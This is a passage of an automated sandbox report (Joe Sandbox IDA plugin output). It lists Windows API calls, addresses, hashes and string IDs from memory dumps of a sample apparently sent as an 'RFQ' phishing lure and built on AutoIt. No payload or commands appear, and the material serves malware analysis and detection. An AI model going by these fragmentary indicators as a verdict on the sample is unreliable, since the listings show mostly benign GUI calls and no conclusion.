                                                                                • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                                                • Opcode Fuzzy Hash: 01f500350c9121920feb7755ee40dd21149ff6c4001fb330d259501f12758d04
                                                                                • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 0048A903
                                                                                • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                                • GetSysColor.USER32(00000011), ref: 0048A945
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                                • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                                • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                                • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                                • DeleteObject.GDI32(?), ref: 0048AA89
                                                                                • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                                • DeleteObject.GDI32(?), ref: 0048AA94
                                                                                • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                                • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: 0d843f32c5cd40bf7db8cb2b67fbd8dc18a2df2c2a6b2ca83797da6c53ab7f18
                                                                                • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                                                • Opcode Fuzzy Hash: 0d843f32c5cd40bf7db8cb2b67fbd8dc18a2df2c2a6b2ca83797da6c53ab7f18
                                                                                • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                                • CharNextW.USER32(0000014E), ref: 00488B01
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                                • _memset.LIBCMT ref: 00488C44
                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                                • _memset.LIBCMT ref: 00488CEC
                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                                • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                • String ID: 0
                                                                                • API String ID: 1073566785-4108050209
                                                                                • Opcode ID: 41f0708c9e496ce240b2fcbe6ecd1c851dd44258a91b4427458c4025c321e4c6
                                                                                • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                                                • Opcode Fuzzy Hash: 41f0708c9e496ce240b2fcbe6ecd1c851dd44258a91b4427458c4025c321e4c6
                                                                                • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 004849CA
                                                                                • GetDesktopWindow.USER32 ref: 004849DF
                                                                                • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                                • DestroyWindow.USER32(?), ref: 00484A74
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                                • IsWindowVisible.USER32(?), ref: 00484B29
                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                                • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                                • CopyRect.USER32(?,?), ref: 00484BC7
                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                                                • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                                                APIs
                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                                                • _wcscpy.LIBCMT ref: 00464500
                                                                                • _wcscmp.LIBCMT ref: 0046450B
                                                                                • _wcscat.LIBCMT ref: 00464521
                                                                                • _wcsstr.LIBCMT ref: 0046452C
                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                                                • _wcscat.LIBCMT ref: 00464591
                                                                                • _wcscat.LIBCMT ref: 00464598
                                                                                • _wcsncpy.LIBCMT ref: 004645C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 699586101-1459072770
                                                                                • Opcode ID: f71a8e981e11c88fae17c789c4f28a1016e6d2973b38c9e4e43a4f373b24f533
                                                                                • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                                                • Opcode Fuzzy Hash: f71a8e981e11c88fae17c789c4f28a1016e6d2973b38c9e4e43a4f373b24f533
                                                                                • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                                • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                                • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                                • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                                • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                  • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                  • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
                                                                                • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                                                • Opcode Fuzzy Hash: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
                                                                                • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                                • __swprintf.LIBCMT ref: 0045A51B
                                                                                • _wcscmp.LIBCMT ref: 0045A52E
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                                • _wcscmp.LIBCMT ref: 0045A5BF
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                                • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                                • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                                • GetParent.USER32(?), ref: 0045A69C
                                                                                • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                                • _wcscmp.LIBCMT ref: 0045A731
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                                • _wcscmp.LIBCMT ref: 0045A76B
                                                                                  • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                • String ID: %s%u
                                                                                • API String ID: 3744389584-679674701
                                                                                • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                                                • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                                                APIs
                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                                • _wcscmp.LIBCMT ref: 0045AF29
                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                                • _wcscmp.LIBCMT ref: 0045AF8C
                                                                                • _wcsstr.LIBCMT ref: 0045AF9D
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                                • _wcscmp.LIBCMT ref: 0045AFE5
                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                                • _wcscmp.LIBCMT ref: 0045B065
                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                                • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                • String ID: @$ThumbnailClass
                                                                                • API String ID: 1788623398-1539354611
                                                                                • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                                                • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                  • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                  • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                  • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                                • _wcscat.LIBCMT ref: 0048C6EE
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                                • DragFinish.SHELL32(?), ref: 0048C75E
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                • String ID: %$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 169749273-1419779174
                                                                                • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                                                • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                • API String ID: 1038674560-1810252412
                                                                                • Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                                • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                                • Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                                • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                                APIs
                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                                • GetCursorInfo.USER32(?), ref: 004750C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load$Info
                                                                                • String ID:
                                                                                • API String ID: 2577412497-0
                                                                                • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                                • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
